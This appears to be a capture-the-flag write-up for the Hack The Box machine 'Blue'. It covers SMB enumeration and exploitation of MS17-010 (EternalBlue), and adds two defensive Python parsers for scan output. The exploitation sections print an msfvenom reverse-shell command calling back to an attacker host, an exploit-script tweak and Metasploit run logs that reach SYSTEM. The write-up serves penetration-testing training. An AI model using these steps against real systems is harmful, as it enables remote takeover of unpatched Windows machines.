HTB - Blue


The given box, Blue, is a Windows machine with the IP address 10.10.10.40.

Recon

Nmap Scan Result

On performing an nmap scan against the target, we can see that three standard ports are open:

1. msrpc - 135
2. netbios-ssn - 139
3. SMB - 445

The scan also identified the OS as Windows 7 Professional 7601 Service Pack 1.

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 17:52 IST
Nmap scan report for 10.10.10.40
Host is up (0.28s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -13m38s, deviation: 34m35s, median: 6m19s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-09-15T13:30:22+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-09-15T12:30:21
|_  start_date: 2021-09-15T12:28:12

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   351.26 ms 10.10.14.1
2   351.39 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.55 seconds
```

Enumeration

Enumerating with smbmap

We know that port 445 is open, so we can perform SMB enumeration to check whether any of the SMB shares are accessible.

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.40
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
```

It didn't list any shares.

NOTE

If enumerating SMB shares with smbmap fails, try it with a wrong or guest username and password combination; the server may then fall back to a guest session, as it does here.

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.40 -u moni
[+] Guest session       IP: 10.10.10.40:445     Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY
```

So, as a guest, we can access the Share and Users SMB shares on the machine.
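The same share listing, consumed from the defender's side, as an added example (not code from smbmap or from the original writeup): it parses smbmap's table, records whether the session was a guest session, and returns the shares that were readable or writable without real credentials. The sample output is constructed from the run above.

```python
"""Parse smbmap share output and flag shares accessible to a guest session.

Added example for this writeup; not part of smbmap or the original post.
Input is the text smbmap prints: a session line, then a Disk/Permissions/Comment table.
"""
import re

# Constructed sample, modelled on the `smbmap -H 10.10.10.40 -u moni` run above.
SMBMAP_OUTPUT = """\
[+] Guest session       IP: 10.10.10.40:445     Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY
"""

# A table row: indented share name (may contain single spaces), two or more
# spaces, one of smbmap's permission strings, then an optional comment.
ROW_RE = re.compile(
    r'^\s+(\S.*?)\s{2,}(NO ACCESS|READ ONLY|WRITE ONLY|READ, WRITE)(?:\s{2,}(.*))?\s*$'
)


def parse_smbmap(text):
    """Return (session_kind, shares); session_kind is 'guest' or 'other'."""
    session = 'guest' if 'Guest session' in text else 'other'
    shares = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:  # header and '----' rows carry no permission token, so they never match
            shares.append({'name': m.group(1), 'perm': m.group(2),
                           'comment': (m.group(3) or '').strip()})
    return session, shares


def exposed_shares(text):
    """Shares that grant any access in this session, plus the session kind.

    In a guest session every entry returned is reachable without valid
    credentials; administrative shares (names ending in '$') are flagged.
    """
    session, shares = parse_smbmap(text)
    exposed = [dict(s, admin=s['name'].endswith('$'))
               for s in shares if s['perm'] != 'NO ACCESS']
    return exposed, session


if __name__ == '__main__':
    shares, session = exposed_shares(SMBMAP_OUTPUT)
    for s in shares:
        flag = ' (admin share)' if s['admin'] else ''
        print(f"[{session}] {s['name']}: {s['perm']}{flag}")
```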

Enumerating with smbclient

Now, let's enumerate these SMB shares with smbclient to check for any clues.

Listing the Share SMB share,

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbclient -N //10.10.10.40/Share
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jul 14 19:18:44 2017
  ..                                  D        0  Fri Jul 14 19:18:44 2017

                8362495 blocks of size 4096. 4258863 blocks available
smb: \>
```

Listing the Users SMB share,

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbclient -N //10.10.10.40/Users
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Jul 21 12:26:23 2017
  ..                                 DR        0  Fri Jul 21 12:26:23 2017
  Default                           DHR        0  Tue Jul 14 12:37:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 10:24:24 2009
  Public                             DR        0  Tue Apr 12 13:21:29 2011

                8362495 blocks of size 4096. 4258863 blocks available
smb: \> cd Public
smb: \Public\> ls
  .                                  DR        0  Tue Apr 12 13:21:29 2011
  ..                                 DR        0  Tue Apr 12 13:21:29 2011
  desktop.ini                       AHS      174  Tue Jul 14 10:24:24 2009
  Documents                          DR        0  Tue Jul 14 10:38:56 2009
  Downloads                          DR        0  Tue Jul 14 10:24:24 2009
  Favorites                         DHR        0  Tue Jul 14 08:04:59 2009
  Libraries                         DHR        0  Tue Jul 14 10:24:24 2009
  Music                              DR        0  Tue Jul 14 10:24:24 2009
  Pictures                           DR        0  Tue Jul 14 10:24:24 2009
  Recorded TV                        DR        0  Tue Apr 12 13:21:29 2011
  Videos                             DR        0  Tue Jul 14 10:24:24 2009

                8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\> cd Documents
smb: \Public\Documents\> ls
  .                                  DR        0  Tue Jul 14 10:38:56 2009
  ..                                 DR        0  Tue Jul 14 10:38:56 2009
  desktop.ini                       AHS      278  Tue Jul 14 10:24:24 2009

                8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\Documents\> cd ..
smb: \Public\> cd Downloads
smb: \Public\Downloads\> ls
  .                                  DR        0  Tue Jul 14 10:24:24 2009
  ..                                 DR        0  Tue Jul 14 10:24:24 2009
  desktop.ini                       AHS      174  Tue Jul 14 10:24:24 2009

                8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\Downloads\> cd ..
smb: \Public\> ls
  .                                  DR        0  Tue Apr 12 13:21:29 2011
  ..                                 DR        0  Tue Apr 12 13:21:29 2011
  desktop.ini                       AHS      174  Tue Jul 14 10:24:24 2009
  Documents                          DR        0  Tue Jul 14 10:38:56 2009
  Downloads                          DR        0  Tue Jul 14 10:24:24 2009
  Favorites                         DHR        0  Tue Jul 14 08:04:59 2009
  Libraries                         DHR        0  Tue Jul 14 10:24:24 2009
  Music                              DR        0  Tue Jul 14 10:24:24 2009
  Pictures                           DR        0  Tue Jul 14 10:24:24 2009
  Recorded TV                        DR        0  Tue Apr 12 13:21:29 2011
  Videos                             DR        0  Tue Jul 14 10:24:24 2009

                8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\> cd ..
smb: \> ls
  .                                  DR        0  Fri Jul 21 12:26:23 2017
  ..                                 DR        0  Fri Jul 21 12:26:23 2017
  Default                           DHR        0  Tue Jul 14 12:37:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 10:24:24 2009
  Public                             DR        0  Tue Apr 12 13:21:29 2011

                8362495 blocks of size 4096. 4258863 blocks available
smb: \> cd Default
smb: \Default\> ls
  .                                 DHR        0  Tue Jul 14 12:37:31 2009
  ..                                DHR        0  Tue Jul 14 12:37:31 2009
  AppData                           DHn        0  Tue Jul 14 08:50:08 2009
  Desktop                            DR        0  Tue Jul 14 08:04:59 2009
  Documents                          DR        0  Tue Jul 14 10:38:56 2009
  Downloads                          DR        0  Tue Jul 14 08:04:59 2009
  Favorites                          DR        0  Tue Jul 14 08:04:59 2009
  Links                              DR        0  Tue Jul 14 08:04:59 2009
  Music                              DR        0  Tue Jul 14 08:04:59 2009
  NTUSER.DAT                       AHSn   262144  Sat Jul 15 04:07:57 2017
  NTUSER.DAT.LOG                     AH     1024  Tue Apr 12 13:24:55 2011
  NTUSER.DAT.LOG1                    AH   189440  Mon Jul 17 01:52:24 2017
  NTUSER.DAT.LOG2                    AH        0  Tue Jul 14 08:04:08 2009
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf    AHS    65536  Tue Jul 14 10:15:54 2009
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Tue Jul 14 10:15:54 2009
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Tue Jul 14 10:15:54 2009
  Pictures                           DR        0  Tue Jul 14 08:04:59 2009
  Saved Games                        Dn        0  Tue Jul 14 08:04:59 2009
  Videos                             DR        0  Tue Jul 14 08:04:59 2009

                8362495 blocks of size 4096. 4258863 blocks available
smb: \Default\> cd Desktop
smb: \Default\Desktop\> ls
  .                                  DR        0  Tue Jul 14 08:04:59 2009
  ..                                 DR        0  Tue Jul 14 08:04:59 2009

                8362495 blocks of size 4096. 4258863 blocks available
smb: \Default\Desktop\>
```

So there is no useful data in the above SMB shares.

We have to find another vulnerability to break in, and SMB is the only exposed protocol we can use.

Nmap script scan

Let's use nmap's scripts to detect known SMB vulnerabilities,

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ ls /usr/share/nmap/scripts | grep smb-vuln
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse
```

These are the SMB vulnerabilities nmap can test for; let's run these scripts against our machine's SMB service

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ sudo nmap --script smb-vuln*  -p 445 -A 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 18:06 IST
Nmap scan report for 10.10.10.40
Host is up (0.28s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   329.56 ms 10.10.14.1
2   329.73 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.42 seconds
```

We have got a hit on the smb-vuln-ms17-010 check: the host is vulnerable to MS17-010 (CVE-2017-0143).
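A defender-side way to consume the same scan output, added here as an example (not nmap's code and not from the original writeup): it parses nmap's "Host script results" block and turns the MS17-010 hit, the disabled SMB1 message signing and the optional SMB2 signing seen in the scans above into findings. The sample block is constructed from the output shown; the parser handles any smb-vuln-* script, not only ms17-010.

```python
"""Turn nmap's SMB host-script output into defender-side findings.

Added example for this writeup (not nmap's code and not from the original post):
it parses the "Host script results" block and reports a VULNERABLE smb-vuln-*
result with its CVE ids, SMB1 message signing disabled, and SMB2 signing that is
enabled but not required.
"""
import re

# Constructed sample: the host-script lines from the two scans above, condensed.
NMAP_OUTPUT = """\
Host script results:
|_clock-skew: mean: -13m38s, deviation: 34m35s, median: 6m19s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

# A script header sits at the left margin: '| name: rest' or '|_name: rest'.
# Body lines are indented further, so the single optional space keeps them out.
HEADER_RE = re.compile(r'^\|_? ?([a-z0-9-]+): ?(.*)$')
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,}')


def parse_host_scripts(text):
    """Return {script_name: [stripped body lines]} for the host-script block."""
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith('|'):
            current = None                      # left the host-script block
            continue
        m = HEADER_RE.match(line)
        if m:
            current = m.group(1)
            rest = m.group(2).strip()
            scripts[current] = [rest] if rest else []
        elif current is not None:
            scripts[current].append(line.lstrip('|_ ').rstrip())
    return scripts


def triage(text):
    """Findings as dicts with script, severity, cves and detail."""
    findings = []
    for name, body in parse_host_scripts(text).items():
        joined = '\n'.join(body)
        if name.startswith('smb-vuln-') and 'State: VULNERABLE' in joined:
            risk = re.search(r'Risk factor:\s*(\w+)', joined)
            title = next((ln for ln in body if ln and ln != 'VULNERABLE:'), name)
            findings.append({'script': name,
                             'severity': risk.group(1) if risk else 'UNKNOWN',
                             'cves': list(dict.fromkeys(CVE_RE.findall(joined))),
                             'detail': title})
        elif name == 'smb-security-mode' and re.search(r'message_signing:\s*disabled', joined):
            findings.append({'script': name, 'severity': 'MEDIUM', 'cves': [],
                             'detail': 'SMB1 message signing disabled; sessions can be relayed or tampered with'})
        elif name == 'smb2-security-mode' and 'not required' in joined:
            findings.append({'script': name, 'severity': 'LOW', 'cves': [],
                             'detail': 'SMB2 message signing enabled but not required'})
    return findings


if __name__ == '__main__':
    for f in triage(NMAP_OUTPUT):
        print(f"{f['severity']:7} {f['script']}: {f['detail']} {' '.join(f['cves'])}")
```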

Finding suitable exploit with searchsploit

Let's look for a suitable exploit for MS17-010 in the searchsploit/exploit-db database

```
┌──(aidenpearce369aidenpearce369)-[~/HTB/Blue]
└─$ searchsploit ms17-010
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit)  | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                   | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)            | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                      | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                   | windows_x86-64/remote/41987.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```

It seems we have a Metasploit module and also other manual exploits for this vulnerability

Gaining Access

MS17-010 Manual Exploit

While searching for manual exploits, you will find many methods and scripts.

For exploiting the EternalBlue vulnerability, I would suggest you take a look at this repo

This repo contains all flavours of MS17-010 exploits, ranging from Windows XP to Windows 8

For this manual exploit, we will use the send_and_execute.py script to execute our own payload on the machine

In this case our payload will be a backdoor/reverse shell

Let's generate our reverse shell with msfvenom

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=6767 -f exe -o backdoor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
```

After installing all the dependencies for the script, let's execute it

```
┌──(aidenpearce369aidenpearce369)-[~/HTB/Blue/MS17-010]
└─$ python send_and_execute.py 10.10.10.40 backdoor.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Not found accessible named pipe
Done
```

The script failed because it could not find an accessible named pipe.

It's the same problem we hit when enumerating SMB with smbmap.

Sometimes the default credentials won't work for SMB; you have to explicitly specify the credentials.

Modify this line in send_and_execute.py:

```python
USERNAME = 'guest'
```

Now let's try the exploit again,

```
┌──(aidenpearce369aidenpearce369)-[~/HTB/Blue/MS17-010]
└─$ python send_and_execute.py 10.10.10.40 backdoor.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001ca0020
SESSION: 0xfffff8a00e21f060
FLINK: 0xfffff8a001399048
InParam: 0xfffff8a00844715c
MID: 0x3807
unexpected alignment, diff: 0x-70aefb8
leak failed... try again
CONNECTION: 0xfffffa8001ca0020
SESSION: 0xfffff8a00e21f060
FLINK: 0xfffff8a008459088
InParam: 0xfffff8a00845315c
MID: 0x3803
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file UFY6OQ.exe...
Opening SVCManager on 10.10.10.40.....
Creating service MasR.....
Starting service MasR.....
The NETBIOS connection with the remote host timed out.
Removing service MasR.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
```

Despite the service errors at the end, it worked and spawned our reverse shell on the netcat listener

```
┌──(aidenpearce369aidenpearce369)-[~]
└─$ nc -nlvp 6767
listening on [any] 6767 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.40] 49159
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```

MS17-010 Metasploit Exploit

With the Metasploit module there is no need to worry about dependencies or exploit code.

We can exploit the MS17-010 EternalBlue vulnerability simply by setting the remote host and our listener

```
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windo
                                             ws 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7
                                             , Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
                                             Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.88     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.8
LHOST => 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.40:49158) at 2021-09-15 18:19:01 +0530
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege

meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../../
meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-07-21 12:26:23 +0530  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 10:38:56 +0530  All Users
40555/r-xr-xr-x   8192  dir   2009-07-14 08:50:08 +0530  Default
40777/rwxrwxrwx   0     dir   2009-07-14 10:38:56 +0530  Default User
40555/r-xr-xr-x   4096  dir   2009-07-14 08:50:08 +0530  Public
100666/rw-rw-rw-  174   fil   2009-07-14 10:24:24 +0530  desktop.ini
40777/rwxrwxrwx   8192  dir   2017-07-14 19:15:33 +0530  haris

meterpreter > cat haris/Desktop/user.txt
<---USER FLAG--->
meterpreter > cat Administrator/Desktop/root.txt
<---ROOT FLAG--->
meterpreter >
```